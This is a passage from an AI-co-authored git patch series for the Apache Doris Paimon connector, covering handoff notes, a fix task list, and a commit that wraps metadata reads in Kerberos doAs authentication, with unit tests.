scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** - 每个 fix 独立 commit;message = `fix: ` + 根因 + 解法 + 测试,末尾带 `Co-Authored-By: Claude Opus 4.8 (1M context) `。 -- 改 fe-core/SPI 的 fix:commit 须含连接器 + SPI + fe-core 三侧 + 测试(#5 大概率纯连接器/FE-wiring)。 +- 改 fe-core/SPI 的 fix:commit 须含连接器 + SPI + fe-core 三侧 + 测试(#6 大概率含 fe-core authenticator 接线)。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。**`-am` 必带**(漏 `-am` 会因 `${revision}` 解析失败报「could not resolve fe-connector-spi」而非真错——本 session 踩过)。`-pl :fe-connector-paimon -am` **不重编 fe-core**;改 fe-core 须单独 `-pl :fe-core -am`。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : **-am** -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`;验证读 surefire XML + `MVN_EXIT`([[doris-build-verify-gotchas]])。**`-am` 必带**(漏 `-am` 会因 `${revision}` 解析失败报「could not resolve fe-connector-spi」而非真错)。`-pl :fe-connector-paimon -am` **不重编 fe-core**;改 fe-core 须单独 `-pl :fe-core -am`。checkstyle 单独 `checkstyle:check`(`test` 阶段不绑)。 - 连接器禁 import fe-core:`bash tools/check-connector-imports.sh`(仅允许 `org.apache.doris.{thrift,connector,extension,filesystem}`)。 - cwd 跨 Bash 调用持久,`cd` 破相对路径 → 一律绝对路径。 -- 测试优先 runnable FE **单测**(连接器 harness:`FakePaimonTable`/`RecordingPaimonCatalogOps`/`RecordingConnectorContext`/`PaimonScanPlanProviderTest`);live-e2e(S3/OSS/REST/JDBC/Kerberos)CI-gated → 注明 gated,勿谎称跑过。 +- 测试优先 runnable FE **单测**(连接器 harness:`FakePaimonTable`/`RecordingPaimonCatalogOps`/`RecordingConnectorContext`/`PaimonConnectorMetadataTest`/`PaimonScanPlanProviderTest`);live-e2e(S3/OSS/REST/JDBC/Kerberos)CI-gated → 注明 gated,勿谎称跑过。 ## 🧠 给下一个 agent 的 meta -- **#4 验证的高价值模式**:scout workflow(5 并行 reader 复核 finding + legacy parity + SPI 缝)→ 设计 → 实现 → **fail-before 实测**(临时 neuter 源码、`-am` 跑两测类、确认正确的 5 个 bug-catcher 向红、其余 guard 测两态皆绿)→ **4-lens clean-room review + 独立 verify**(揪出 CREATE-time-only 校验 gap)。**对 BLOCKER/安全类 fix 务必做 review**([[clean-room-adversarial-review-pref]])。 -- 改 fe-core handle/scan 流前,先 grep 全 `metadata.getTableHandle` / scan-node 调用方(历史教训:独立 handle 面绕 seam 会静默错行)。 -- P2 两条(#8/#9)严重度有争议 → **先找用户定 scope 再动手**。M-crit(#5)未过 3-lens → 实现前先独立复核 dotted-vs-underscore key 事实。 -- **#4 留的跨连接器 follow-up([DV-028])**:CREATE-time-only driver-url 校验是 fe-core 全 plugin 连接器共有缝;若将来要 close,须新 `ConnectorContext` scan-time 校验 hook + fe-core ALTER 路接 `preCreateValidation`(注意会触发 JDBC 连接器 BE 连通测)—— 独立工单,非 paimon 专属。 +- **#5 验证的高价值模式(再次奏效)**:critic-surfaced/未过-3-lens 的 finding → **先 scout workflow 独立复核**(5 并行 reader 各 1 角度:git-history canonical-key intent / legacy parity / docs+regression 证据 / failure-manifestation 端到端 / 跨连接器 scope)+ **对抗 synthesizer 先 steelman false-positive 再裁决** → 设计 → 实现 → **fail-before 实测**(临时 neuter 源码值、跑两测、bug-catcher 向红 guard 两态绿)→ 4-lens review 可选。本次 scout 揪出 finding 没说的关键事实:① binary 键**双重漂移**(不只分隔符)② hive/iceberg **同根因**(决定 scope 要问用户)③ BE scan param 经 `FileQueryScanNode` 继承本就读点分(决定「无 BE」)。 +- **改 fe-core handle/scan 流前,先 grep 全 `metadata.getTableHandle` / scan-node 调用方**(历史教训:独立 handle 面绕 seam 会静默错行)。 +- **#6 两处 scope 决策先问用户**(D7 读-vs-DDL 不对称是否打破 / M-8「DLF」从句先核实);P2 两条(#8/#9)严重度有争议 → **先找用户定 scope 再动手**。 +- **跨连接器 follow-up 累积**:[DV-028](#4 CREATE-time-only 校验,全 plugin 连接器共有)+ [DV-030](#5 hive+iceberg mapping-flag 键,同 paimon 根因)—— 若将来批量 close,二者都是「新连接器读法 vs fe-core 既有约定」的同类缝。 diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 67d05f3bf96a80..ad5c6d9ba86958 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -27,7 +27,7 @@ | 2 | FIX-STATIC-CREDS-BE | BLOCKER | B-9 | static s3/oss/cos/obs creds → BE as canonical `AWS_*` | **yes** | ✅ | ✅ | ✅ | ✅ `d23d5df9914` | | 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (M-10 deferred) | connector builds `current_schema_id`/`history_schema_info` thrift dict (Design C) | no¹ | ✅ | ✅ | ✅ 222/0/0 | ✅ `667f779af04` | | 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | no² | ✅ | ✅ | ✅ 232/0/0 | ✅ `2d15b1b7ed7` | -| 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ✅ | ✅ | ✅ 234/0/0 | 🔄 | +| 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ✅ | ✅ | ✅ 234/0/0 | ✅ `9dcf6d1a9e5` | | 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | UGI `doAs` on fs/jdbc ops + partition-listing read path | maybe | ⬜ | ⬜ | ⬜ | ⬜ | | 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ⬜ | ⬜ | ⬜ | ⬜ | | 8 | FIX-COUNT-PUSHDOWN | MAJOR* | M-2 | FE-computed `mergedRowCount` / `paimon.row_count` (perf) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | From 689903ed20b6b4ea0c6be500d3667864f30f884e Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 23:28:16 +0800 Subject: [PATCH 024/128] =?UTF-8?q?fix:=20FIX-KERBEROS-DOAS=20=E2=80=94=20?= =?UTF-8?q?wire=20fs/jdbc=20HDFS=20authenticator=20(M-8)=20+=20wrap=20all?= =?UTF-8?q?=20read=20RPCs=20in=20doAs=20(M-11)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Both are Kerberos-only (harmless on simple-auth: the no-op authenticator's execute() == task.call()). Root cause - M-8 (fe-core): paimon filesystem/jdbc catalogs over Kerberized HDFS lost UGI doAs on the cutover path. The HDFS HadoopExecutionAuthenticator is built only inside initializeCatalog(), which is dead on the plugin path (only legacy PaimonExternalCatalog calls it), so PluginDrivenExternalCatalog read the base no-op from getExecutionAuthenticator(). HMS was unaffected — it wires the authenticator in initNormalizeAndCheckProps(), which always runs. - M-11 (connector): metadata read RPCs (listDatabases/getDatabase/listTables/ getTable[handle+sys+resolveTable]/listPartitions) ran without executeAuthenticated; only the 4 DDL ops were wrapped (signed D7=B read-vs-DDL asymmetry). On a Kerberos HMS catalog these reads ran outside the catalog principal. Legacy wrapped every read. Fix - M-8 (filesystem+jdbc only; DLF/REST/HMS excluded — DLF uses Aliyun STS not Kerberos, the review's "DLF" clause was overstated): new internal fe-core hook MetastoreProperties.initExecutionAuthenticator(List) (default no-op), invoked by PluginDrivenExternalCatalog.initPreExecutionAuthenticator from the already-built storage list; filesystem/jdbc override it to build the HDFS authenticator (shared AbstractPaimonProperties helper), mirroring HMS. No connector change; no connector SPI change. - M-11 (full legacy parity, signed D-052, supersedes the D7=B read clause): wrap all 7 connector read RPCs in context.executeAuthenticated. A single resolveTable wrap covers all resolveTable callers (metadata + scan). Domain exceptions are caught INSIDE the lambda because Kerberos UGI.doAs wraps a thrown checked Catalog.*NotExistException in UndeclaredThrowableException. Tests - M-11: PaimonConnectorMetadataReadAuthTest (12) + 2 scan-path tests assert each read runs inside executeAuthenticated (RecordingConnectorContext failAuth/ authCount). Connector module 248/0/0 (1 CI-gated skip). - M-8: Paimon{FileSystem,Jdbc}MetaStorePropertiesTest assert getExecutionAuthenticator() returns HadoopExecutionAuthenticator after wiring without initializeCatalog; fe-core metastore-props 21/0/0 (DLF/HMS regression-clean). - fail-before verified red for both (M-8: stays base no-op AbstractPaimonProperties$1; M-11: authCount/log-empty). - True end-to-end doAs is live-Kerberos-e2e only (no paimon-kerberos suite); DV-031. Decisions D-052 (M-11) / D-053 (M-8); deviation DV-031; design plan-doc/tasks/designs/P5-fix-KERBEROS-DOAS-design.md. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonConnectorMetadata.java | 108 ++++++-- .../paimon/PaimonScanPlanProvider.java | 10 +- .../PaimonConnectorMetadataReadAuthTest.java | 247 ++++++++++++++++++ .../paimon/PaimonScanPlanProviderTest.java | 36 +++ .../PluginDrivenExternalCatalog.java | 5 + .../metastore/AbstractPaimonProperties.java | 23 ++ .../metastore/MetastoreProperties.java | 18 ++ .../PaimonFileSystemMetaStoreProperties.java | 11 + .../PaimonJdbcMetaStoreProperties.java | 11 + ...imonFileSystemMetaStorePropertiesTest.java | 22 ++ .../PaimonJdbcMetaStorePropertiesTest.java | 24 ++ plan-doc/decisions-log.md | 2 + plan-doc/deviations-log.md | 3 +- plan-doc/task-list-P5-rereview2-fixes.md | 3 +- .../designs/P5-fix-KERBEROS-DOAS-design.md | 131 ++++++++++ 15 files changed, 623 insertions(+), 31 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataReadAuthTest.java create mode 100644 plan-doc/tasks/designs/P5-fix-KERBEROS-DOAS-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index a6a7579d737ad8..012bddf0a98416 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -92,8 +92,10 @@ public PaimonConnectorMetadata(PaimonCatalogOps catalogOps, Map @Override public List listDatabaseNames(ConnectorSession session) { + // M-11: wrap the remote read in executeAuthenticated so the FE-injected Kerberos UGI applies + // (legacy PaimonMetadataOps.listDatabaseNames wrapped it too). Full read-vs-DDL parity (D-052). try { - return catalogOps.listDatabases(); + return context.executeAuthenticated(() -> catalogOps.listDatabases()); } catch (Exception e) { LOG.warn("Failed to list Paimon databases", e); return Collections.emptyList(); @@ -102,21 +104,38 @@ public List listDatabaseNames(ConnectorSession session) { @Override public boolean databaseExists(ConnectorSession session, String dbName) { + // M-11: wrap the remote read in executeAuthenticated (D-052). DatabaseNotExistException is + // caught INSIDE the lambda: under Kerberos UGI.doAs would otherwise wrap the checked + // exception in UndeclaredThrowableException, so an outer catch would not match. try { - catalogOps.getDatabase(dbName); - return true; - } catch (Catalog.DatabaseNotExistException e) { - return false; + return context.executeAuthenticated(() -> { + try { + catalogOps.getDatabase(dbName); + return true; + } catch (Catalog.DatabaseNotExistException e) { + return false; + } + }); + } catch (Exception e) { + throw new DorisConnectorException( + "Failed to check Paimon database existence " + dbName + ": " + e.getMessage(), e); } } @Override public List listTableNames(ConnectorSession session, String dbName) { + // M-11: wrap the remote read in executeAuthenticated (D-052). DatabaseNotExistException is + // caught INSIDE the lambda (Kerberos UGI.doAs would wrap it otherwise); other failures fall + // to the outer catch, preserving the original empty-list-on-error behavior. try { - return catalogOps.listTables(dbName); - } catch (Catalog.DatabaseNotExistException e) { - LOG.warn("Database does not exist: {}", dbName); - return Collections.emptyList(); + return context.executeAuthenticated(() -> { + try { + return catalogOps.listTables(dbName); + } catch (Catalog.DatabaseNotExistException e) { + LOG.warn("Database does not exist: {}", dbName); + return Collections.emptyList(); + } + }); } catch (Exception e) { LOG.warn("Failed to list tables in database: {}", dbName, e); return Collections.emptyList(); @@ -127,18 +146,26 @@ public List listTableNames(ConnectorSession session, String dbName) { public Optional getTableHandle( ConnectorSession session, String dbName, String tableName) { Identifier identifier = Identifier.create(dbName, tableName); + // M-11: wrap the remote getTable in executeAuthenticated (D-052). TableNotExistException is + // caught INSIDE the lambda (Kerberos UGI.doAs would wrap it otherwise) and yields an empty + // handle, exactly as before; the trailing handle build is pure (no remote call). try { - Table table = catalogOps.getTable(identifier); - List partitionKeys = table.partitionKeys(); - List primaryKeys = table.primaryKeys(); - PaimonTableHandle handle = new PaimonTableHandle( - dbName, tableName, - partitionKeys != null ? partitionKeys : Collections.emptyList(), - primaryKeys != null ? primaryKeys : Collections.emptyList()); - handle.setPaimonTable(table); - return Optional.of(handle); - } catch (Catalog.TableNotExistException e) { - return Optional.empty(); + return context.executeAuthenticated(() -> { + Table table; + try { + table = catalogOps.getTable(identifier); + } catch (Catalog.TableNotExistException e) { + return Optional.empty(); + } + List partitionKeys = table.partitionKeys(); + List primaryKeys = table.primaryKeys(); + PaimonTableHandle handle = new PaimonTableHandle( + dbName, tableName, + partitionKeys != null ? partitionKeys : Collections.emptyList(), + primaryKeys != null ? primaryKeys : Collections.emptyList()); + handle.setPaimonTable(table); + return Optional.of(handle); + }); } catch (Exception e) { LOG.warn("Failed to get Paimon table handle: {}.{}", dbName, tableName, e); return Optional.empty(); @@ -287,10 +314,22 @@ public Optional getSysTableHandle(ConnectorSession session String sys = sysName.toLowerCase(java.util.Locale.ROOT); Identifier sysId = new Identifier( base.getDatabaseName(), base.getTableName(), "main", sys); + // M-11: wrap the remote getTable in executeAuthenticated (D-052). TableNotExistException is + // caught INSIDE the lambda (Kerberos UGI.doAs would wrap it otherwise) and signalled out as a + // null Table so this method can still short-circuit to Optional.empty(). Table sysTable; try { - sysTable = catalogOps.getTable(sysId); - } catch (Catalog.TableNotExistException e) { + sysTable = context.executeAuthenticated(() -> { + try { + return catalogOps.getTable(sysId); + } catch (Catalog.TableNotExistException e) { + return null; + } + }); + } catch (Exception e) { + throw new RuntimeException("Failed to load Paimon system table: " + sysId, e); + } + if (sysTable == null) { return Optional.empty(); } boolean forceJni = "binlog".equals(sys) || "audit_log".equals(sys); @@ -889,13 +928,22 @@ private List collectPartitions(PaimonTableHandle paimonH Table table = resolveTable(paimonHandle); Identifier identifier = Identifier.create( paimonHandle.getDatabaseName(), paimonHandle.getTableName()); + // M-11: wrap the remote listPartitions in executeAuthenticated (D-052), mirroring legacy + // PaimonExternalCatalog.getPaimonPartitions which ran it inside executionAuthenticator.execute + // and swallowed TableNotExistException INSIDE the wrap (Kerberos UGI.doAs would otherwise wrap + // the checked exception, so it must be caught inside). List paimonPartitions; try { - paimonPartitions = catalogOps.listPartitions(identifier); - } catch (Catalog.TableNotExistException e) { - // Legacy getPaimonPartitions swallows TableNotExistException and returns empty. - LOG.warn("Paimon table not found while listing partitions: {}", identifier, e); - return Collections.emptyList(); + paimonPartitions = context.executeAuthenticated(() -> { + try { + return catalogOps.listPartitions(identifier); + } catch (Catalog.TableNotExistException e) { + LOG.warn("Paimon table not found while listing partitions: {}", identifier, e); + return Collections.emptyList(); + } + }); + } catch (Exception e) { + throw new RuntimeException("Failed to list Paimon partitions: " + identifier, e); } boolean legacyName = Boolean.parseBoolean( @@ -983,8 +1031,12 @@ public Optional getTableStatistics( *

      Preserves this site's original wrapping of a reload failure as a {@link RuntimeException}. */ private Table resolveTable(PaimonTableHandle paimonHandle) { + // M-11: wrap the (possibly remote) reload in executeAuthenticated (D-052) so every metadata + // read path that resolves a table runs under the FE-injected Kerberos UGI. The transient-table + // fast path inside resolve issues no RPC, so the wrap is a no-op there. The existing catch-all + // absorbs the (under Kerberos, UGI.doAs-wrapped) reload failure exactly as before. try { - return PaimonTableResolver.resolve(catalogOps, paimonHandle); + return context.executeAuthenticated(() -> PaimonTableResolver.resolve(catalogOps, paimonHandle)); } catch (Exception e) { throw new RuntimeException("Failed to load Paimon table: " + paimonHandle, e); } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 8fb5cae590c6b8..dc4731937e3f87 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -183,8 +183,16 @@ static boolean isCppReaderEnabled(ConnectorSession session) { * net (it is not snapshot-consistent with the handle's originating catalog). */ Table resolveTable(PaimonTableHandle paimonHandle) { + // M-11: wrap the (possibly remote) reload in executeAuthenticated (D-052) so the scan path's + // table resolution runs under the FE-injected Kerberos UGI, matching the metadata twin. The + // transient-table fast path issues no RPC; the FileIO split planning below is intentionally + // NOT wrapped (legacy did not wrap it either). When there is no context (offline unit tests + // via the 2-arg ctor), resolve directly — same convention as getScanNodeProperties above. try { - return PaimonTableResolver.resolve(catalogOps, paimonHandle); + if (context == null) { + return PaimonTableResolver.resolve(catalogOps, paimonHandle); + } + return context.executeAuthenticated(() -> PaimonTableResolver.resolve(catalogOps, paimonHandle)); } catch (Exception e) { throw new RuntimeException("Failed to load Paimon table: " + paimonHandle, e); } diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataReadAuthTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataReadAuthTest.java new file mode 100644 index 00000000000000..0d6626de87121d --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataReadAuthTest.java @@ -0,0 +1,247 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; + +import org.apache.paimon.partition.Partition; +import org.apache.paimon.types.DataTypes; +import org.apache.paimon.types.RowType; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Arrays; +import java.util.Collections; +import java.util.LinkedHashMap; +import java.util.List; +import java.util.Map; +import java.util.Optional; + +/** + * M-11 (rereview2 #6) read-path Kerberos doAs tests: every remote metadata READ RPC must run INSIDE + * {@link org.apache.doris.connector.spi.ConnectorContext#executeAuthenticated}, for full legacy + * parity (D-052) with legacy {@code PaimonMetadataOps}/{@code PaimonExternalCatalog} which wrapped + * every read. Mirrors the DDL-path tests in {@link PaimonConnectorMetadataDdlTest}. + * + *

      Uses {@link RecordingConnectorContext#failAuth} (throws WITHOUT running the task) to prove each + * seam call sits INSIDE the authenticator: if a read called the {@link RecordingPaimonCatalogOps} + * seam directly, the recording fake would log the call despite the auth failure. The happy-path + * companions assert {@link RecordingConnectorContext#authCount} so dropping a wrap also goes red. + * + *

      All offline against the recording seam (null real catalog). + */ +public class PaimonConnectorMetadataReadAuthTest { + + private static PaimonConnectorMetadata metadata(RecordingPaimonCatalogOps ops, + RecordingConnectorContext ctx) { + return new PaimonConnectorMetadata(ops, Collections.emptyMap(), ctx); + } + + private static PaimonTableHandle baseHandle() { + return new PaimonTableHandle("db1", "t1", Collections.emptyList(), Collections.emptyList()); + } + + private static FakePaimonTable singleColTable(String col) { + return new FakePaimonTable("t1", + RowType.builder().field(col, DataTypes.STRING()).build(), + Collections.emptyList(), Collections.emptyList()); + } + + // ==================== listDatabaseNames ==================== + + @Test + public void listDatabaseNamesRunsSeamInsideAuthenticator() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + // listDatabaseNames swallows failures and returns empty; the proof is that the seam NEVER ran + // (log empty) yet the authenticator was entered. MUTATION: an un-wrapped direct + // catalogOps.listDatabases() would log "listDatabases" despite the auth failure -> red. + Assertions.assertTrue(metadata(ops, ctx).listDatabaseNames(null).isEmpty()); + Assertions.assertTrue(ops.log.isEmpty(), + "auth failure must abort BEFORE the listDatabases seam runs"); + Assertions.assertEquals(1, ctx.authCount); + } + + @Test + public void listDatabaseNamesEntersAuthenticatorOnHappyPath() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.databases = Arrays.asList("db1", "db2"); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + Assertions.assertEquals(Arrays.asList("db1", "db2"), metadata(ops, ctx).listDatabaseNames(null)); + Assertions.assertEquals(Collections.singletonList("listDatabases"), ops.log); + Assertions.assertEquals(1, ctx.authCount); + } + + // ==================== databaseExists ==================== + + @Test + public void databaseExistsRunsSeamInsideAuthenticator() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + // databaseExists rethrows the auth failure as DorisConnectorException; the seam never ran. + Assertions.assertThrows(DorisConnectorException.class, + () -> metadata(ops, ctx).databaseExists(null, "db1")); + Assertions.assertTrue(ops.log.isEmpty(), + "auth failure must abort BEFORE the getDatabase seam runs"); + Assertions.assertEquals(1, ctx.authCount); + } + + @Test + public void databaseExistsTrueAndFalseEnterAuthenticator() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + Assertions.assertTrue(metadata(ops, ctx).databaseExists(null, "db1")); + Assertions.assertEquals(Collections.singletonList("getDatabase:db1"), ops.log); + Assertions.assertEquals(1, ctx.authCount); + + // DatabaseNotExistException is caught INSIDE the lambda (Kerberos UGI.doAs would otherwise + // wrap the checked exception, defeating an outer catch) -> returns false, no rethrow. + RecordingPaimonCatalogOps ops2 = new RecordingPaimonCatalogOps(); + ops2.throwDatabaseNotExist = true; + RecordingConnectorContext ctx2 = new RecordingConnectorContext(); + Assertions.assertFalse(metadata(ops2, ctx2).databaseExists(null, "db1")); + Assertions.assertEquals(1, ctx2.authCount); + } + + // ==================== listTableNames ==================== + + @Test + public void listTableNamesRunsSeamInsideAuthenticator() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + Assertions.assertTrue(metadata(ops, ctx).listTableNames(null, "db1").isEmpty()); + Assertions.assertTrue(ops.log.isEmpty(), + "auth failure must abort BEFORE the listTables seam runs"); + Assertions.assertEquals(1, ctx.authCount); + } + + @Test + public void listTableNamesEntersAuthenticatorOnHappyPath() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.tables = Arrays.asList("t1", "t2"); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + Assertions.assertEquals(Arrays.asList("t1", "t2"), metadata(ops, ctx).listTableNames(null, "db1")); + Assertions.assertEquals(Collections.singletonList("listTables:db1"), ops.log); + Assertions.assertEquals(1, ctx.authCount); + } + + // ==================== getTableHandle ==================== + + @Test + public void getTableHandleRunsSeamInsideAuthenticator() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + Optional result = metadata(ops, ctx).getTableHandle(null, "db1", "t1"); + Assertions.assertFalse(result.isPresent()); + Assertions.assertTrue(ops.log.isEmpty(), + "auth failure must abort BEFORE the getTable seam runs"); + Assertions.assertEquals(1, ctx.authCount); + } + + @Test + public void getTableHandleEntersAuthenticatorOnHappyPath() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.table = singleColTable("id"); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + Assertions.assertTrue(metadata(ops, ctx).getTableHandle(null, "db1", "t1").isPresent()); + Assertions.assertEquals(Collections.singletonList("getTable:db1.t1"), ops.log); + Assertions.assertEquals(1, ctx.authCount); + } + + // ==================== getSysTableHandle ==================== + + @Test + public void getSysTableHandleRunsSeamInsideAuthenticator() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + // getSysTableHandle rethrows the auth failure as RuntimeException; the sys getTable never ran. + Assertions.assertThrows(RuntimeException.class, + () -> metadata(ops, ctx).getSysTableHandle(null, baseHandle(), "snapshots")); + Assertions.assertTrue(ops.log.isEmpty(), + "auth failure must abort BEFORE the sys getTable seam runs"); + Assertions.assertEquals(1, ctx.authCount); + } + + @Test + public void getSysTableHandleEntersAuthenticatorOnHappyPath() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.sysTable = new FakePaimonTable("t1$snapshots", + RowType.builder().field("snapshot_id", DataTypes.BIGINT()).build(), + Collections.emptyList(), Collections.emptyList()); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + Assertions.assertTrue(metadata(ops, ctx).getSysTableHandle(null, baseHandle(), "snapshots").isPresent()); + Assertions.assertEquals(1, ctx.authCount); + } + + // ==================== listPartitions (resolveTable + listPartitions both wrapped) ==================== + + @Test + public void listPartitionNamesEntersAuthenticatorForBothResolveAndListPartitions() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = new FakePaimonTable("t1", + RowType.builder().field("region", DataTypes.STRING()).build(), + Collections.singletonList("region"), Collections.emptyList()); + ops.table = table; + Map spec = new LinkedHashMap<>(); + spec.put("region", "cn"); + ops.partitions = Collections.singletonList( + new Partition(spec, 1L, 1L, /*fileCount*/ 1, 1L, /*done*/ true)); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.singletonList("region"), Collections.emptyList()); + handle.setPaimonTable(table); + + List names = metadata(ops, ctx).listPartitionNames(null, handle); + + Assertions.assertEquals(Collections.singletonList("region=cn"), names); + // WHY: BOTH the table resolution (resolveTable) AND the listPartitions RPC must each run inside + // executeAuthenticated (D-052). The handle carries a transient table so resolveTable issues no + // getTable RPC, but it STILL enters the authenticator; listPartitions then enters it again. + // MUTATION: dropping the listPartitions wrap leaves authCount==1 (only resolveTable) -> red; + // dropping the resolveTable wrap leaves authCount==1 (only listPartitions) -> red. + Assertions.assertEquals(2, ctx.authCount); + Assertions.assertEquals(Collections.singletonList("listPartitions:db1.t1"), ops.log); + } + + @Test + public void listPartitionNamesAbortsInsideAuthenticatorOnAuthFailure() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + FakePaimonTable table = singleColTable("region"); + ops.table = table; + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + + PaimonTableHandle handle = new PaimonTableHandle( + "db1", "t1", Collections.singletonList("region"), Collections.emptyList()); + handle.setPaimonTable(table); + + // The FIRST wrapped op (resolveTable) aborts under failAuth, so collectPartitions throws and + // neither getTable nor listPartitions ever runs. + Assertions.assertThrows(RuntimeException.class, + () -> metadata(ops, ctx).listPartitionNames(null, handle)); + Assertions.assertTrue(ops.log.isEmpty(), + "auth failure must abort BEFORE any partition-path seam runs"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index 173c29f3e5d7ab..50182165bf0d61 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -148,6 +148,42 @@ public void resolveTableForSysHandleReloadsViaFourArgSysIdentifier() { "the sys Identifier branch must be hardcoded 'main' (legacy parity)"); } + @Test + public void resolveTableRunsInsideAuthenticatorWhenContextPresent() { + // M-11 (D-052): with a real ConnectorContext the scan-path reload must run inside + // executeAuthenticated, so the FE-injected Kerberos UGI applies. Under failAuth the wrapped + // reload aborts BEFORE the getTable seam runs. MUTATION: an un-wrapped resolveTable would call + // catalogOps.getTable directly -> "getTable:db1.t1" logged despite the auth failure -> red. + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.table = new FakePaimonTable( + "t1", rowType("id"), Collections.emptyList(), Collections.emptyList()); + RecordingConnectorContext ctx = new RecordingConnectorContext(); + ctx.failAuth = true; + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops, ctx); + PaimonTableHandle handle = new 